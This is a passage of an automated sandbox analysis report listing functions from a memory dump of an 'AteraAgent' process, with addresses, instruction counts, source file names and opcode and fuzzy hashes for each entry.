                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c5b0c1f21682f8980668d515f45ded70f437204b1354ed1e62882369c53e30d7
                                                                                                                                                                                                                                                                            • Instruction ID: 1f866dd817eca46abcbff10b71dc85095cede7ccec95eeca37e4f3a00af290d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5b0c1f21682f8980668d515f45ded70f437204b1354ed1e62882369c53e30d7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC813877A0EB848FF256D79CA8152F97FD0EFC32A1B0881BBD14C8B0A7D9165C4942D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB475B70 Relevance: .3, Instructions: 313COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c02a0b1da39997d87921f8cbdc1b22ea58277c350f1e9ec9a70dd0c3ee1b5095
                                                                                                                                                                                                                                                                            • Instruction ID: cc99b2e1c9d9d1940240f3689586469e6a0b98cfdb6a024a80bc1e3544c5afa4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c02a0b1da39997d87921f8cbdc1b22ea58277c350f1e9ec9a70dd0c3ee1b5095
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08710663F0ED5A8FF3A5935C586D27417C1EBAA2D1B248176D48DCB2E5DD189C8A83C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB49E790 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 285203352389a3369e32f32d97afea245de54b1ff94a0c936b253b7caa008d34
                                                                                                                                                                                                                                                                            • Instruction ID: 7c4f06801fa5eab69ecd819e428e8341f21db3bf8073fdac8a9f16858a125a93
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 285203352389a3369e32f32d97afea245de54b1ff94a0c936b253b7caa008d34
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9812931A0DB098FEB64DB5CD8456B577E1FF9A310F14857ED04EC31A2DA26B84B8781
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D469 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d0a14cfc5eefbb5b88de5df187a6df2b6a633a2595f1cbfb8c18397d84467f84
                                                                                                                                                                                                                                                                            • Instruction ID: ff6d2124ef41f923ef1aca800db1492c06c89fe490416a747d5c392495204f18
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0a14cfc5eefbb5b88de5df187a6df2b6a633a2595f1cbfb8c18397d84467f84
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F19194A2F18A598FEB54E7A8D865BACFBF1FFA9340F1441B6D00CC7192CD246C418B52
                                                                                                                                                                                                                                                                            Function 00007FFAAB48A2B1 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7496721864908ca43d8ce583a538b1e6e139a00ab32a78d10a80ffc9bc190af2
                                                                                                                                                                                                                                                                            • Instruction ID: 12bd49faa0875b328fc3fe75a815f4c0ce0d010260ea7497556ebc1c095a92f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7496721864908ca43d8ce583a538b1e6e139a00ab32a78d10a80ffc9bc190af2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5091E270A1DB858FEBA8D72C84597397BD1EF5A340F14457DD08EC72A2CE64A845C782
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A015 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 34e32061fbbb36fd96e7a16c89852318d3a92a58e9e10d37274bc8d3c14b7638
                                                                                                                                                                                                                                                                            • Instruction ID: baa1fbcaf6a7ceaf8863441301b45a67fc03aebff6dda25a364ed9f372816861
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34e32061fbbb36fd96e7a16c89852318d3a92a58e9e10d37274bc8d3c14b7638
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7791F86291CF868FF654E728C444B79B7E2FF56390F444579D04EC7192DE28A886C7C2
                                                                                                                                                                                                                                                                            Function 00007FFAAB47CA28 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e4df556522c4c2c8395e218beba0d2a8d15f5aa2b4774136e6438ae82ceeecff
                                                                                                                                                                                                                                                                            • Instruction ID: 4e230497c74c5241ac533a97a003b83ecc47d20eec24763c615b854b8ce67041
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4df556522c4c2c8395e218beba0d2a8d15f5aa2b4774136e6438ae82ceeecff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C781583061EB898FE769D76C98257757BD0EF9A350F1445BED08DC32A3DE24A849C381
                                                                                                                                                                                                                                                                            Function 00007FFAAB46EA20 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9f6d21738bee98cb56e2e3732595e99ead6a4f720e0276c1aa6503dc5a7b2393
                                                                                                                                                                                                                                                                            • Instruction ID: a30f784d11fde1b81bbfb4f9869ca349d8820d5e7e9c5292c843a57736649da9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6d21738bee98cb56e2e3732595e99ead6a4f720e0276c1aa6503dc5a7b2393
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0715652A1FACA8FF76693AC98551756FE1EF9729071841FBD09CC72A3DC045C4A83C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB464610 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cf05f502fd9ba1a591d5a76853c114cb90cc71bfcf75a7048488e8cefa0b9c1f
                                                                                                                                                                                                                                                                            • Instruction ID: 9d7b00b0857d5e851a9d0b8e26e91d82802ce97e7baa10b370f77a9ff77429af
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf05f502fd9ba1a591d5a76853c114cb90cc71bfcf75a7048488e8cefa0b9c1f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50918171918A8E8FDB84EF68C854AEDB7F1FF59300F104679D40DD72A6DA34A846CB80
                                                                                                                                                                                                                                                                            Function 00007FFAAB482C95 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 74d4119e20fea6f45ace336c2f7e7fbc9b0ed07b1ef67d268c7e4f34aa0a123a
                                                                                                                                                                                                                                                                            • Instruction ID: a583232ac751fffa0cdbbe5eecb2869b5039f4f5d163b9cd86c9989592ada505
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74d4119e20fea6f45ace336c2f7e7fbc9b0ed07b1ef67d268c7e4f34aa0a123a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8619C32A0EB4B8FE759AB6CD8515757BE1EF66350B0441BED48EC7193D928BC4A83C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D76E Relevance: .2, Instructions: 234COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 857e31cd4ebdba4dea93a2906437b78adb6011f508e7ee6f451deccaa47041de
                                                                                                                                                                                                                                                                            • Instruction ID: d591c08af9264ad2e30d06eb1a760a73050dea8a51ee400bb5bcb1a8bdbd13eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 857e31cd4ebdba4dea93a2906437b78adb6011f508e7ee6f451deccaa47041de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56615A7290DF898FE759A72C98555BCBBE1EF47390B1441BAD05DC71E7C9242C0A83D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB487FD5 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5d0ea24aee45221ec86a80aa5b9c3f5b7e4a99e6cd7aa4f881c1852b0fa3898d
                                                                                                                                                                                                                                                                            • Instruction ID: ba8c5d64faaaeb5875b213bada0405af9a35669ef7f778020b640cda27fc3f75
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0ea24aee45221ec86a80aa5b9c3f5b7e4a99e6cd7aa4f881c1852b0fa3898d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F71E23190DA899FEB94EF6CC8656F83FE0EF56354F0541B6E45CC71A2CA24A849C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB47DC05 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 137183fbb61663626f81832b75d27664dc864ecae7e921a96fe54ee95ebcae65
                                                                                                                                                                                                                                                                            • Instruction ID: aaac5ccf04bf4797e3a3826c1e164c7c283f93d34843a322b732343709bb6cbd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137183fbb61663626f81832b75d27664dc864ecae7e921a96fe54ee95ebcae65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0515B62B29E194FE7D8A72C98597B937D1EF95390F0801BBE44DC72A1DE189C8683C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB4680DD Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 099c35bbd5d98d1237194de020d956b04b7b7c51afeff2091f5d7d87021e7a00
                                                                                                                                                                                                                                                                            • Instruction ID: ee35d6485544e8d3df5dda96733785bdfcee13cb65abf6a4474f17c685b65120
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 099c35bbd5d98d1237194de020d956b04b7b7c51afeff2091f5d7d87021e7a00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18812B70D0961D8FEB59DB68C854BEDBBB0EF56340F5041BAD00DE72A2CB386989CB51
                                                                                                                                                                                                                                                                            Function 00007FFAAB465B6A Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f85a1eeca4400897c1850bd8bbc8ff1c899539faaff490b630c56703442d63ee
                                                                                                                                                                                                                                                                            • Instruction ID: fd35b8bd14140475b6730657d1c91a43d7d199d4a9fe7061fd32c5b246a3fdf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f85a1eeca4400897c1850bd8bbc8ff1c899539faaff490b630c56703442d63ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9161073080E7888FD746CB68C864B997FF1EF57344F2441EAD048DB2A2CA394D86CB61
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A850 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23b63f3cf27b8af60312a99f3aa9a8d6c1e66b3dca30c4875d6a2f68ddcd6444
                                                                                                                                                                                                                                                                            • Instruction ID: 0f029bbaa41d200fc8241d166106fb4f7adea28509901c54c369036e35aa3410
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23b63f3cf27b8af60312a99f3aa9a8d6c1e66b3dca30c4875d6a2f68ddcd6444
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351C943D4EFC29BF65573ACE4251FCEBA0AF923A5B1985B7D04C460E79C08580D52D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A858 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6dce57490ee7f76550be92530ba17f50fab5058248f533f3c9854e8612c5b2a1
                                                                                                                                                                                                                                                                            • Instruction ID: 51f026919b34f5b23c496025d0c44b2b2cddd1b33b69505066305bed7a2b4589
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dce57490ee7f76550be92530ba17f50fab5058248f533f3c9854e8612c5b2a1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4551B947E4EFD29BF66573ACE4251FCEBA0AF923E5B0985B7D04C860E79C08580D52D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB474BF0 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2af31a407af8a5bf285f4265b2424dc8ba7973e7a1a70276c7a4f5e34dd1d7e8
                                                                                                                                                                                                                                                                            • Instruction ID: 5594045fc423985686b99937768cf9179fa5f2f6e1bb821aeb8433a062030e87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2af31a407af8a5bf285f4265b2424dc8ba7973e7a1a70276c7a4f5e34dd1d7e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511C2270DD498FF7A9E32C845567977E1EF95380B0940BAD08EC32A2DE18AC4AC3C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46ADFA Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dcd58c7f499cafb47f824bef22cc21f4ef2e7303379959b7ebcc2c8db8f803e2
                                                                                                                                                                                                                                                                            • Instruction ID: d7dd3fc75f51b8f4c87488e9750cff109a1d3095fe387aa5bb0cfc9f57198851
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcd58c7f499cafb47f824bef22cc21f4ef2e7303379959b7ebcc2c8db8f803e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5411962B5DF8A8FE798E72CD4612B9B3D1FFD6250B08417AD04DC7292DD18D80643C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47E8DB Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4214a658648359e65518d21641e740d48edc63bdf074ea99125d84151da08472
                                                                                                                                                                                                                                                                            • Instruction ID: dbc062d9c80c981c024c2f455cde6af0444dd50a6f7116f391ee6fcee55d5e9b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4214a658648359e65518d21641e740d48edc63bdf074ea99125d84151da08472
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51D6A1B1DE498FEB98EB2C8055A6937E1EF5A340F0481F9D44DCB2A7CD18AC49C381
                                                                                                                                                                                                                                                                            Function 00007FFAAB47AFC9 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: eaac4c3a7be1462531554ad0a4cc2fcd769db6df49ea714ddd797d132938478d
                                                                                                                                                                                                                                                                            • Instruction ID: 8f2f5a52718cf8d5eec884b34f092c2bb98588ca3846f8d068882a726cf18b15
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eaac4c3a7be1462531554ad0a4cc2fcd769db6df49ea714ddd797d132938478d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC51F371D0965D8FDB98EFA8C495AEDBBB1FF19300F5040AAD00DE7292DA396985CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB473C30 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9b46b0e9dae2ed72987a09da0e332f23959ba8b73fb97f510d074da93345041a
                                                                                                                                                                                                                                                                            • Instruction ID: 057354096d11c225202d4e77fbb05944b954af130b286e94f781f957b252c816
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b46b0e9dae2ed72987a09da0e332f23959ba8b73fb97f510d074da93345041a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41F23061AE0A8FD7689B18C884A7177E5FF5A340B148679D44DCB2A6DA35FC8AC7C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB464605 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
